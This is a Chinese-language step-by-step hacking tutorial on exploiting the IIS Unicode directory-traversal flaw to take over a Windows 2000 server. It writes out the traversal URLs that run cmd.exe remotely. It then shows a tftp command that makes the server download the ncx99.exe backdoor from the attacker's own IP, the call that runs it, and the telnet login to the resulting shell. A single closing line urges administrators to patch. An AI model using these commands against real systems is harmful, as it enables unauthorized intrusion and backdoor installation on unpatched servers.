利用Unicode漏洞控制Windows2000

　　unicode如今成为热门的漏洞之一，下面catsun将给大家详细讲解利用unicode漏洞进入Windows 2000的详细过程。由于关于Unicode的文章很多，就不讲述如何去寻找一个有此漏洞的主机，也不讲如何利用此漏洞修改主页，主要讲一下如何控制这个Windows2000机器。

　　开始：

　　现在我们找到的一台漏洞主机：202.100.100.1（假设）

　　当然下面的调用大家再熟悉不过：

　　http://***.***.***.***/scripts/..%c1%1c../winnt/

　　system32/cmd.exe?/c+dir+c:

　　目录被列出，到这，大家都知道，可以修改主页，删除或在服务器上移动一些文件了。

　　但此时您的权限很低，怎样得到更高得权限呢？方法也有不少，但成功率并不很高。经过比较，让服务器下载木马的方法较好：

　　首先，下载unicode工具;解压后有如下文件：

　　tftpd32.exe（一个FTP服务器）

　　ncx99.exe（telnet到99端口）

　　这两个大家都熟悉吧，其他的不用管。

　　运行tftpd32.exe

　　这是一个小巧的FTP服务器，在运行它之前，建议关闭其他FTP服务器，保持tftpd运行，这时你的机器已经是一个FTP服务器了。回到你的浏览器，在地址栏里填入：

　　http://***.***.***.***/scripts/..%c1%1c../winnt/system32/

　　cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\inetpub\scripts\sr.exe

　　.???.???.???为你自己的IP，

　　注意：c:\inetpub\scripts\sr.exe 其中c:\inetpub\scripts\为主机服务器目录，要看主机的具体情况而定，sr.exe为被改名的ncx99.exe（自己选名字吧）。

　　然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:inetpubscripts目录了，您可以自己检查一下。

　　再使用如下调用来执行ncx99.exe(sr.exe)

　　http://***.***.***.***/scripts/..%c1%1c../winnt/system32/

　　cmd.exe?/c+c:inetpubscriptssr.exe

　　然后您就可以 telnet ***.***.***.***

　　以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定，这只是一个方法。

　　注意：

　　视窗安全 想用简单的描述告诉大家，IISunicode漏洞的危害，请国内的Administrators们尽快补好.